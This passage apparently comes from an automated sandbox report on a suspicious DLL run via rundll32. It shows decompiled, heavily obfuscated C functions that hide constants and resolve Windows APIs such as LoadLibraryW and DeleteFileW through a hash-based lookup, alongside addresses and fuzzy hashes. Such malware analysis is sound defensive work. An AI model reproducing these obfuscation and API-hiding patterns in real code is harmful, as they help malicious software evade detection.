                                                                                                        				_v12 = _v12 + 0x8f69;
                                                                                                        				_v12 = _v12 * 0x4c;
                                                                                                        				_v12 = _v12 ^ 0x410f7a13;
                                                                                                        				_v8 = 0x7b4696;
                                                                                                        				_v8 = _v8 + 0xffff4950;
                                                                                                        				_v8 = _v8 | 0x2a0f624b;
                                                                                                        				_v8 = _v8 * 0x3a;
                                                                                                        				_v8 = _v8 ^ 0xa0f3ec54;
                                                                                                        				_v20 = 0x8a2161;
                                                                                                        				_v20 = _v20 + 0xffff45ea;
                                                                                                        				_v20 = _v20 ^ 0x1b6c7fa6;
                                                                                                        				_v20 = _v20 ^ 0x1be8dede;
                                                                                                        				_v16 = 0xdcc12a;
                                                                                                        				_v16 = _v16 + 0xb9f4;
                                                                                                        				_v16 = _v16 + 0xffffcfef;
                                                                                                        				_v16 = _v16 ^ 0x00d9de04;
                                                                                                        				E006CEB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
                                                                                                        				_t53 = lstrcmpiW(_a4, _t56); // executed
                                                                                                        				return _t53;
                                                                                                        			}












                                                                                                        0x006e0624
                                                                                                        0x006e0627
                                                                                                        0x006e0629
                                                                                                        0x006e062c
                                                                                                        0x006e062f
                                                                                                        0x006e0630
                                                                                                        0x006e0631
                                                                                                        0x006e0636
                                                                                                        0x006e063d
                                                                                                        0x006e0644
                                                                                                        0x006e064b
                                                                                                        0x006e064f
                                                                                                        0x006e0667
                                                                                                        0x006e066a
                                                                                                        0x006e0671
                                                                                                        0x006e0678
                                                                                                        0x006e067f
                                                                                                        0x006e068b
                                                                                                        0x006e068e
                                                                                                        0x006e0695
                                                                                                        0x006e069c
                                                                                                        0x006e06a3
                                                                                                        0x006e06aa
                                                                                                        0x006e06b1
                                                                                                        0x006e06b8
                                                                                                        0x006e06bf
                                                                                                        0x006e06c6
                                                                                                        0x006e06d9
                                                                                                        0x006e06e5
                                                                                                        0x006e06eb

                                                                                                        APIs
                                                                                                        • lstrcmpiW.KERNEL32(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 006E06E5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.310675126.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.310659344.00000000006C0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.310790430.00000000006E6000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6c0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 1586166983-0
                                                                                                        • Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                        • Instruction ID: 83e210476216ec8459a8adee9ff99124ab2acb102a98288068733740e823cae6
                                                                                                        • Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                        • Instruction Fuzzy Hash: 0621E3B1C01319BBCF14DFA9D94A9DEBFB5FB10354F108198E529A6251D3B59B04CF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        C-Code - Quality: 99%
                                                                                                        			E006DCCD9(void* __ecx, void* __edx) {
                                                                                                        				signed int _v4;
                                                                                                        				intOrPtr _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				signed int _v28;
                                                                                                        				signed int _v32;
                                                                                                        				signed int _v36;
                                                                                                        				signed int _v40;
                                                                                                        				signed int _v44;
                                                                                                        				signed int _v48;
                                                                                                        				signed int _v52;
                                                                                                        				signed int _v56;
                                                                                                        				signed int _v60;
                                                                                                        				signed int _v64;
                                                                                                        				signed int _v68;
                                                                                                        				signed int _v72;
                                                                                                        				signed int _v76;
                                                                                                        				signed int _v80;
                                                                                                        				signed int _v84;
                                                                                                        				signed int _v88;
                                                                                                        				signed int _v92;
                                                                                                        				signed int _v96;
                                                                                                        				signed int _v100;
                                                                                                        				void* _t242;
                                                                                                        				intOrPtr _t243;
                                                                                                        				intOrPtr _t244;
                                                                                                        				void* _t248;
                                                                                                        				signed int _t250;
                                                                                                        				signed int _t251;
                                                                                                        				signed int _t252;
                                                                                                        				signed int _t253;
                                                                                                        				signed int _t254;
                                                                                                        				void* _t282;
                                                                                                        				void* _t283;
                                                                                                        				signed int _t285;
                                                                                                        				signed int* _t287;
                                                                                                        				signed int* _t288;
                                                                                                        
                                                                                                        				_t287 =  &_v100;
                                                                                                        				_v4 = _v4 & 0x00000000;
                                                                                                        				_v8 = 0x71e8b0;
                                                                                                        				_v36 = 0x18cf5b;
                                                                                                        				_v36 = _v36 + 0x6698;
                                                                                                        				_v36 = _v36 ^ 0x001a117a;
                                                                                                        				_v60 = 0xa2890;
                                                                                                        				_t282 = __edx;
                                                                                                        				_t248 = __ecx;
                                                                                                        				_t283 = 0x72ed85;
                                                                                                        				_t250 = 0x42;
                                                                                                        				_v60 = _v60 / _t250;
                                                                                                        				_v60 = _v60 ^ 0xe73bacde;
                                                                                                        				_v60 = _v60 ^ 0xe73fbe74;
                                                                                                        				_v40 = 0x9c8291;
                                                                                                        				_t251 = 0x70;
                                                                                                        				_v40 = _v40 / _t251;
                                                                                                        				_v40 = _v40 ^ 0x000cc374;
                                                                                                        				_v64 = 0xa8df6e;
                                                                                                        				_t252 = 0x66;
                                                                                                        				_v64 = _v64 * 0x5a;
                                                                                                        				_v64 = _v64 | 0x6df616d5;
                                                                                                        				_v64 = _v64 ^ 0x7ff9e958;
                                                                                                        				_v88 = 0xc174cb;
                                                                                                        				_v88 = _v88 ^ 0xe7b64a13;
                                                                                                        				_v88 = _v88 ^ 0xc84137a7;
                                                                                                        				_v88 = _v88 << 0xc;
                                                                                                        				_v88 = _v88 ^ 0x60915aca;
                                                                                                        				_v32 = 0x752193;
                                                                                                        				_v32 = _v32 * 0x3f;
                                                                                                        				_v32 = _v32 ^ 0x1cda7702;
                                                                                                        				_v92 = 0x141833;
                                                                                                        				_v92 = _v92 + 0xffffc8f8;
                                                                                                        				_v92 = _v92 + 0xf362;
                                                                                                        				_v92 = _v92 << 0x10;
                                                                                                        				_v92 = _v92 ^ 0xd48431d2;
                                                                                                        				_v96 = 0xc34044;
                                                                                                        				_v96 = _v96 << 8;
                                                                                                        				_v96 = _v96 + 0xffff536d;
                                                                                                        				_v96 = _v96 + 0x5d23;
                                                                                                        				_v96 = _v96 ^ 0xc334c852;
                                                                                                        				_v20 = 0x3a6348;
                                                                                                        				_v20 = _v20 << 0x10;
                                                                                                        				_v20 = _v20 ^ 0x6343ca6d;
                                                                                                        				_v56 = 0x49cd71;
                                                                                                        				_v56 = _v56 ^ 0x72d9145f;
                                                                                                        				_v56 = _v56 + 0x4f98;
                                                                                                        				_v56 = _v56 ^ 0x7290366b;
                                                                                                        				_v24 = 0x3bf83a;
                                                                                                        				_v24 = _v24 << 9;
                                                                                                        				_v24 = _v24 ^ 0x77f6a760;
                                                                                                        				_v28 = 0x632842;
                                                                                                        				_v28 = _v28 + 0xffffe69b;
                                                                                                        				_v28 = _v28 ^ 0x006ee443;
                                                                                                        				_v48 = 0x4b2ed5;
                                                                                                        				_v48 = _v48 ^ 0x82c7a85b;
                                                                                                        				_v48 = _v48 + 0xffff7c4b;
                                                                                                        				_v48 = _v48 ^ 0x8282f052;
                                                                                                        				_v52 = 0x4c7b52;
                                                                                                        				_v52 = _v52 + 0xffffbc1f;
                                                                                                        				_v52 = _v52 + 0x2e12;
                                                                                                        				_v52 = _v52 ^ 0x004752b1;
                                                                                                        				_v16 = 0x3a13fc;
                                                                                                        				_v16 = _v16 / _t252;
                                                                                                        				_v16 = _v16 ^ 0x00081e0d;
                                                                                                        				_v84 = 0x8573c6;
                                                                                                        				_t253 = 0x4b;
                                                                                                        				_v84 = _v84 / _t253;
                                                                                                        				_v84 = _v84 | 0x42242f90;
                                                                                                        				_v84 = _v84 >> 0xc;
                                                                                                        				_v84 = _v84 ^ 0x00008b33;
                                                                                                        				_v100 = 0x3509ce;
                                                                                                        				_t254 = 0x19;
                                                                                                        				_v100 = _v100 / _t254;
                                                                                                        				_t285 = 0x44;
                                                                                                        				_t255 = 0x6f;
                                                                                                        				_v100 = _v100 * 0x31;
                                                                                                        				_v100 = _v100 + 0x6b64;
                                                                                                        				_v100 = _v100 ^ 0x006714bf;
                                                                                                        				_v68 = 0x65eeb7;
                                                                                                        				_v68 = _v68 + 0x24bd;
                                                                                                        				_v68 = _v68 << 7;
                                                                                                        				_v68 = _v68 ^ 0x330bb4b3;
                                                                                                        				_v72 = 0x31388d;
                                                                                                        				_v72 = _v72 * 0x77;
                                                                                                        				_v72 = _v72 / _t285;
                                                                                                        				_v72 = _v72 ^ 0x00560572;
                                                                                                        				_v76 = 0x10ecc2;
                                                                                                        				_v76 = _v76 | 0x28471304;
                                                                                                        				_v76 = _v76 + 0xcdda;
                                                                                                        				_v76 = _v76 ^ 0x285661a5;
                                                                                                        				_v44 = 0xf32c83;
                                                                                                        				_v44 = _v44 / _t255;
                                                                                                        				_v44 = _v44 / _t285;
                                                                                                        				_v44 = _v44 ^ 0x000ff213;
                                                                                                        				_v80 = 0xb9f4a0;
                                                                                                        				_v80 = _v80 << 0xa;
                                                                                                        				_v80 = _v80 + 0xd38f;
                                                                                                        				_v80 = _v80 >> 8;
                                                                                                        				_v80 = _v80 ^ 0x00ede5ae;
                                                                                                        				_v12 = 0x138f30;
                                                                                                        				_v12 = _v12 ^ 0xf49e1969;
                                                                                                        				_v12 = _v12 ^ 0xf48aec3a;
                                                                                                        				while(1) {
                                                                                                        					L1:
                                                                                                        					_t242 = 0xd8fe181;
                                                                                                        					do {
                                                                                                        						L2:
                                                                                                        						while(_t283 != 0x72ed85) {
                                                                                                        							if(_t283 == 0xb6c7232) {
                                                                                                        								_t278 = _v52;
                                                                                                        								_t255 = _v48;
                                                                                                        								_t243 = E006E1005(_v48, _v52, _v16, _v84,  *((intOrPtr*)(_t282 + 0x38)));
                                                                                                        								_t287 =  &(_t287[3]);
                                                                                                        								 *((intOrPtr*)(_t282 + 0x2c)) = _t243;
                                                                                                        								__eflags = _t243;
                                                                                                        								_t242 = 0xd8fe181;
                                                                                                        								_t283 =  !=  ? 0xd8fe181 : 0xd6f812a;
                                                                                                        								continue;
                                                                                                        							}
                                                                                                        							if(_t283 == 0xc5020c9) {
                                                                                                        								_push(_v64);
                                                                                                        								_t244 = E006E3263(_v36, _v60, __eflags, _t248, _v40, _t255);
                                                                                                        								_t288 =  &(_t287[4]);
                                                                                                        								 *((intOrPtr*)(_t282 + 0x38)) = _t244;
                                                                                                        								__eflags = _t244;
                                                                                                        								if(_t244 != 0) {
                                                                                                        									E006E148A(_t244, _t244, _v88, _v32, _v92, _v96);
                                                                                                        									_t278 = _v56;
                                                                                                        									_t255 = _v20;
                                                                                                        									E006CE2BD(_v56, _v24,  *((intOrPtr*)(_t282 + 0x38)), _v28);
                                                                                                        									_t287 =  &(_t288[7]);
                                                                                                        									_t283 = 0xb6c7232;
                                                                                                        									goto L1;
                                                                                                        								}
                                                                                                        							} else {
                                                                                                        								if(_t283 == 0xd6f812a) {
                                                                                                        									return E006CF0E9(_v44,  *((intOrPtr*)(_t282 + 0x38)), _v80, _v12);
                                                                                                        								}
                                                                                                        								if(_t283 != _t242) {
                                                                                                        									goto L13;
                                                                                                        								} else {
                                                                                                        									_t244 = E006D0EBC(_v100, _t278, _v68, _v100, _v72, _v76, _v100, _t255, _t282, E006E25F1);
                                                                                                        									_t287 =  &(_t287[8]);
                                                                                                        									 *((intOrPtr*)(_t282 + 0x48)) = _t244;
                                                                                                        									if(_t244 == 0) {
                                                                                                        										_t283 = 0xd6f812a;
                                                                                                        										while(1) {
                                                                                                        											L1:
                                                                                                        											_t242 = 0xd8fe181;
                                                                                                        											goto L2;
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        							return _t244;
                                                                                                        						}
                                                                                                        						_t283 = 0xc5020c9;
                                                                                                        						L13:
                                                                                                        						__eflags = _t283 - 0x11d9bb5;
                                                                                                        					} while (__eflags != 0);
                                                                                                        					return _t242;
                                                                                                        				}
                                                                                                        			}










































                                                                                                        0x006dccd9
                                                                                                        0x006dccdc
                                                                                                        0x006dcce1
                                                                                                        0x006dcce9
                                                                                                        0x006dccf1
                                                                                                        0x006dccf9
                                                                                                        0x006dcd01
                                                                                                        0x006dcd11
                                                                                                        0x006dcd13
                                                                                                        0x006dcd19
                                                                                                        0x006dcd1e
                                                                                                        0x006dcd23
                                                                                                        0x006dcd29
                                                                                                        0x006dcd31
                                                                                                        0x006dcd39
                                                                                                        0x006dcd45
                                                                                                        0x006dcd4a
                                                                                                        0x006dcd50
                                                                                                        0x006dcd58
                                                                                                        0x006dcd65
                                                                                                        0x006dcd66
                                                                                                        0x006dcd6a
                                                                                                        0x006dcd72
                                                                                                        0x006dcd7a
                                                                                                        0x006dcd82
                                                                                                        0x006dcd8a
                                                                                                        0x006dcd92
                                                                                                        0x006dcd97
                                                                                                        0x006dcd9f
                                                                                                        0x006dcdac
                                                                                                        0x006dcdb0
                                                                                                        0x006dcdb8
                                                                                                        0x006dcdc0
                                                                                                        0x006dcdc8
                                                                                                        0x006dcdd0
                                                                                                        0x006dcdd5
                                                                                                        0x006dcddd
                                                                                                        0x006dcde5
                                                                                                        0x006dcdea
                                                                                                        0x006dcdf2
                                                                                                        0x006dcdfa
                                                                                                        0x006dce02
                                                                                                        0x006dce0a
                                                                                                        0x006dce0f
                                                                                                        0x006dce17
                                                                                                        0x006dce1f
                                                                                                        0x006dce27
                                                                                                        0x006dce2f
                                                                                                        0x006dce37
                                                                                                        0x006dce3f
                                                                                                        0x006dce44
                                                                                                        0x006dce4c
                                                                                                        0x006dce54
                                                                                                        0x006dce5c
                                                                                                        0x006dce64
                                                                                                        0x006dce6c
                                                                                                        0x006dce74
                                                                                                        0x006dce7c
                                                                                                        0x006dce84
                                                                                                        0x006dce8c
                                                                                                        0x006dce94
                                                                                                        0x006dce9c
                                                                                                        0x006dcea4
                                                                                                        0x006dceb2
                                                                                                        0x006dceb6
                                                                                                        0x006dcec0
                                                                                                        0x006dcece
                                                                                                        0x006dced3
                                                                                                        0x006dced7
                                                                                                        0x006dcedf
                                                                                                        0x006dcee4
                                                                                                        0x006dceec
                                                                                                        0x006dcefa
                                                                                                        0x006dceff
                                                                                                        0x006dcf0a
                                                                                                        0x006dcf0d
                                                                                                        0x006dcf0e
                                                                                                        0x006dcf12
                                                                                                        0x006dcf1a
                                                                                                        0x006dcf22
                                                                                                        0x006dcf2a
                                                                                                        0x006dcf32
                                                                                                        0x006dcf37
                                                                                                        0x006dcf3f
                                                                                                        0x006dcf4c
                                                                                                        0x006dcf58
                                                                                                        0x006dcf5c
                                                                                                        0x006dcf64
                                                                                                        0x006dcf6c
                                                                                                        0x006dcf74
                                                                                                        0x006dcf7c
                                                                                                        0x006dcf84
                                                                                                        0x006dcf94
                                                                                                        0x006dcfa3
                                                                                                        0x006dcfa7
                                                                                                        0x006dcfaf
                                                                                                        0x006dcfb7
                                                                                                        0x006dcfbc
                                                                                                        0x006dcfc4
                                                                                                        0x006dcfc9
                                                                                                        0x006dcfd1
                                                                                                        0x006dcfd9
                                                                                                        0x006dcfe1
                                                                                                        0x006dcfe9
                                                                                                        0x006dcfe9
                                                                                                        0x006dcfe9
                                                                                                        0x006dcfee
                                                                                                        0x00000000
                                                                                                        0x006dcfee
                                                                                                        0x006dd000
                                                                                                        0x006dd0bc
                                                                                                        0x006dd0c0
                                                                                                        0x006dd0c4
                                                                                                        0x006dd0c9
                                                                                                        0x006dd0cc
                                                                                                        0x006dd0cf
                                                                                                        0x006dd0d3
                                                                                                        0x006dd0d8
                                                                                                        0x00000000
                                                                                                        0x006dd0d8
                                                                                                        0x006dd00c
                                                                                                        0x006dd04e
                                                                                                        0x006dd060
                                                                                                        0x006dd065
                                                                                                        0x006dd068
                                                                                                        0x006dd06b
                                                                                                        0x006dd06d
                                                                                                        0x006dd087
                                                                                                        0x006dd097
                                                                                                        0x006dd09b
                                                                                                        0x006dd09f
                                                                                                        0x006dd0a4
                                                                                                        0x006dd0a7
                                                                                                        0x00000000
                                                                                                        0x006dd0a7
                                                                                                        0x006dd00e
                                                                                                        0x006dd010
                                                                                                        0x00000000
                                                                                                        0x006dd108
                                                                                                        0x006dd018
                                                                                                        0x00000000
                                                                                                        0x006dd01e
                                                                                                        0x006dd037
                                                                                                        0x006dd03c
                                                                                                        0x006dd03f
                                                                                                        0x006dd044
                                                                                                        0x006dd04a
                                                                                                        0x006dcfe9
                                                                                                        0x006dcfe9
                                                                                                        0x006dcfe9
                                                                                                        0x00000000
                                                                                                        0x006dcfe9
                                                                                                        0x006dcfe9
                                                                                                        0x006dd044
                                                                                                        0x006dd018
                                                                                                        0x006dd110
                                                                                                        0x006dd110
                                                                                                        0x006dd0e0
                                                                                                        0x006dd0e5
                                                                                                        0x006dd0e5
                                                                                                        0x006dd0e5
                                                                                                        0x00000000
                                                                                                        0x006dcfee

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.310675126.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.310659344.00000000006C0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.310790430.00000000006E6000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6c0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CursorFrameInfo
                                                                                                        • String ID: #]$$P$Cn$Hc:$R{L$dk
                                                                                                        • API String ID: 453930150-1551317889
                                                                                                        • Opcode ID: cb23345dc60c78753a24234d6723b573b8b8ef0a6842f9672ad5d7ade1e6847a
                                                                                                        • Instruction ID: 6be00ca11d16760692f6980a540c21c676821ba06e06006bf7a63a6d7ffc9b95
                                                                                                        • Opcode Fuzzy Hash: cb23345dc60c78753a24234d6723b573b8b8ef0a6842f9672ad5d7ade1e6847a
                                                                                                        • Instruction Fuzzy Hash: 18B152B29083419FD358CF26C54941BFBE2FBC4748F108A2EF59996260D3B5CA49CF86
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Executed Functions

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 329 49752b9-4975385 call 498fe29 call 497eb52 LoadLibraryW
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E049752B9(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				void* _t47;
                                                                                                        				struct HINSTANCE__* _t59;
                                                                                                        				signed int _t61;
                                                                                                        				signed int _t62;
                                                                                                        				WCHAR* _t68;
                                                                                                        
                                                                                                        				_push(_a12);
                                                                                                        				_t68 = __ecx;
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				_push(__ecx);
                                                                                                        				E0498FE29(_t47);
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v28 = 0x68392e;
                                                                                                        				_v16 = 0xf5950b;
                                                                                                        				_v16 = _v16 ^ 0xb3325752;
                                                                                                        				_v16 = _v16 ^ 0xe58473b2;
                                                                                                        				_v16 = _v16 ^ 0x56462a2c;
                                                                                                        				_v8 = 0x3988bb;
                                                                                                        				_t61 = 0x3a;
                                                                                                        				_v8 = _v8 / _t61;
                                                                                                        				_v8 = _v8 + 0xf338;
                                                                                                        				_v8 = _v8 << 5;
                                                                                                        				_v8 = _v8 ^ 0x0035ea14;
                                                                                                        				_v12 = 0xe53120;
                                                                                                        				_v12 = _v12 ^ 0xa236e8c8;
                                                                                                        				_t62 = 0x62;
                                                                                                        				_v12 = _v12 / _t62;
                                                                                                        				_v12 = _v12 ^ 0x01ab7b97;
                                                                                                        				_v20 = 0x973198;
                                                                                                        				_v20 = _v20 * 0x60;
                                                                                                        				_v20 = _v20 ^ 0x38bce55b;
                                                                                                        				E0497EB52(_t62, _t62, 0xeec842c3, 0xab, 0xa2289af1);
                                                                                                        				_t59 = LoadLibraryW(_t68); // executed
                                                                                                        				return _t59;
                                                                                                        			}














                                                                                                        0x049752c0
                                                                                                        0x049752c3
                                                                                                        0x049752c5
                                                                                                        0x049752c8
                                                                                                        0x049752cc
                                                                                                        0x049752cd
                                                                                                        0x049752d2
                                                                                                        0x049752d9
                                                                                                        0x049752e2
                                                                                                        0x049752e9
                                                                                                        0x049752f0
                                                                                                        0x049752f7
                                                                                                        0x049752fe
                                                                                                        0x0497530a
                                                                                                        0x0497530f
                                                                                                        0x04975314
                                                                                                        0x0497531b
                                                                                                        0x0497531f
                                                                                                        0x04975326
                                                                                                        0x0497532d
                                                                                                        0x04975337
                                                                                                        0x0497533f
                                                                                                        0x04975342
                                                                                                        0x04975349
                                                                                                        0x04975360
                                                                                                        0x04975363
                                                                                                        0x04975376
                                                                                                        0x0497537f
                                                                                                        0x04975385

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.308556502.0000000004971000.00000020.00000001.sdmp, Offset: 04970000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.308551888.0000000004970000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.308572241.0000000004996000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4970000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad
                                                                                                        • String ID: 1$,*FV$.9h
                                                                                                        • API String ID: 1029625771-1870595533
                                                                                                        • Opcode ID: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
                                                                                                        • Instruction ID: 9ac35cc64b7bd4eadb333e228b171d3b295da3b2cad0b9b1103b374d4f25598f
                                                                                                        • Opcode Fuzzy Hash: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
                                                                                                        • Instruction Fuzzy Hash: 4F2156B5D00208FBEF08DFA8D94A9EEBBB5FB40304F108198E815A7250D3B46B14DF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 95%
                                                                                                        			E04991538(void* __ecx, void* __edx, void* _a4) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				void* _t59;
                                                                                                        				int _t75;
                                                                                                        				signed int _t77;
                                                                                                        				signed int _t78;
                                                                                                        				signed int _t79;
                                                                                                        				signed int _t80;
                                                                                                        
                                                                                                        				_push(_a4);
                                                                                                        				E0498FE29(_t59);
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v32 = 0x73095a;
                                                                                                        				_v28 = 0xd34a52;
                                                                                                        				_v16 = 0xb3a153;
                                                                                                        				_t77 = 0x73;
                                                                                                        				_v16 = _v16 / _t77;
                                                                                                        				_v16 = _v16 + 0x4fd2;
                                                                                                        				_v16 = _v16 ^ 0xee3af97f;
                                                                                                        				_v16 = _v16 ^ 0xee3510f4;
                                                                                                        				_v20 = 0xee2064;
                                                                                                        				_v20 = _v20 << 0xe;
                                                                                                        				_v20 = _v20 ^ 0x88190a0a;
                                                                                                        				_v12 = 0x72c7a5;
                                                                                                        				_v12 = _v12 + 0x7839;
                                                                                                        				_t78 = 0x77;
                                                                                                        				_v12 = _v12 / _t78;
                                                                                                        				_t79 = 0x76;
                                                                                                        				_v12 = _v12 / _t79;
                                                                                                        				_v12 = _v12 ^ 0x00040652;
                                                                                                        				_v8 = 0x10c7fb;
                                                                                                        				_t80 = 0x6c;
                                                                                                        				_v8 = _v8 * 0x70;
                                                                                                        				_v8 = _v8 << 8;
                                                                                                        				_v8 = _v8 / _t80;
                                                                                                        				_v8 = _v8 ^ 0x00c83f8f;
                                                                                                        				E0497EB52(_t80, _t80, 0x2aa4bac1, 0x108, 0xa2289af1);
                                                                                                        				_t75 = FindCloseChangeNotification(_a4); // executed
                                                                                                        				return _t75;
                                                                                                        			}
















                                                                                                        0x0499153e
                                                                                                        0x04991543
                                                                                                        0x04991548
                                                                                                        0x0499154f
                                                                                                        0x04991558
                                                                                                        0x0499155f
                                                                                                        0x0499156b
                                                                                                        0x04991570
                                                                                                        0x04991575
                                                                                                        0x0499157c
                                                                                                        0x04991583
                                                                                                        0x0499158a
                                                                                                        0x04991591
                                                                                                        0x04991595
                                                                                                        0x0499159c
                                                                                                        0x049915a3
                                                                                                        0x049915ad
                                                                                                        0x049915b2
                                                                                                        0x049915ba
                                                                                                        0x049915bf
                                                                                                        0x049915c4
                                                                                                        0x049915cb
                                                                                                        0x049915d6
                                                                                                        0x049915e6
                                                                                                        0x049915e9
                                                                                                        0x049915f3
                                                                                                        0x049915f6
                                                                                                        0x0499160a
                                                                                                        0x04991615
                                                                                                        0x0499161a

                                                                                                        APIs
                                                                                                        • FindCloseChangeNotification.KERNEL32(00040652), ref: 04991615
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.308556502.0000000004971000.00000020.00000001.sdmp, Offset: 04970000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.308551888.0000000004970000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.308572241.0000000004996000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4970000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                        • String ID: Zs$d
                                                                                                        • API String ID: 2591292051-3879001491
                                                                                                        • Opcode ID: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
                                                                                                        • Instruction ID: ea67ff1c882807e078a5973300fe258cd567b8028870e79ff6c4ba09838c5bf9
                                                                                                        • Opcode Fuzzy Hash: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
                                                                                                        • Instruction Fuzzy Hash: E8213EB5D40209FFEB04DFA5D9499DDBBB1EB40314F10C099E614B7250D7B96B548F80
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 404 497d061-497d14b call 498fe29 call 497eb52 DeleteFileW
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E0497D061(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				signed int _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				void* _t54;
                                                                                                        				int _t63;
                                                                                                        				signed int _t65;
                                                                                                        				WCHAR* _t69;
                                                                                                        
                                                                                                        				_push(_a12);
                                                                                                        				_t69 = __ecx;
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				_push(__ecx);
                                                                                                        				E0498FE29(_t54);
                                                                                                        				_v28 = _v28 & 0x00000000;
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v36 = 0xa62646;
                                                                                                        				_v32 = 0x27199b;
                                                                                                        				_v20 = 0x942c55;
                                                                                                        				_v20 = _v20 | 0xf0368afe;
                                                                                                        				_v20 = _v20 << 0xa;
                                                                                                        				_v20 = _v20 ^ 0xfbcaf84d;
                                                                                                        				_v20 = _v20 ^ 0x217d6c33;
                                                                                                        				_v16 = 0xf28622;
                                                                                                        				_v16 = _v16 >> 0xe;
                                                                                                        				_v16 = _v16 | 0xeb4a9877;
                                                                                                        				_v16 = _v16 ^ 0x2aded5e4;
                                                                                                        				_v16 = _v16 ^ 0xc19eb21f;
                                                                                                        				_v12 = 0x4a5837;
                                                                                                        				_v12 = _v12 ^ 0xa3e571b7;
                                                                                                        				_v12 = _v12 + 0xffff6305;
                                                                                                        				_t65 = 0x6e;
                                                                                                        				_v12 = _v12 / _t65;
                                                                                                        				_v12 = _v12 ^ 0x01794185;
                                                                                                        				_v8 = 0xa209ee;
                                                                                                        				_v8 = _v8 + 0x62d2;
                                                                                                        				_v8 = _v8 ^ 0x3d892cf6;
                                                                                                        				_v8 = _v8 | 0x5ca7d1ce;
                                                                                                        				_v8 = _v8 ^ 0x7da8dabc;
                                                                                                        				E0497EB52(_t65, _t65, 0x74c3d0b1, 0x1a1, 0xa2289af1);
                                                                                                        				_t63 = DeleteFileW(_t69); // executed
                                                                                                        				return _t63;
                                                                                                        			}















                                                                                                        0x0497d068
                                                                                                        0x0497d06b
                                                                                                        0x0497d06d
                                                                                                        0x0497d070
                                                                                                        0x0497d074
                                                                                                        0x0497d075
                                                                                                        0x0497d07a
                                                                                                        0x0497d081
                                                                                                        0x0497d087
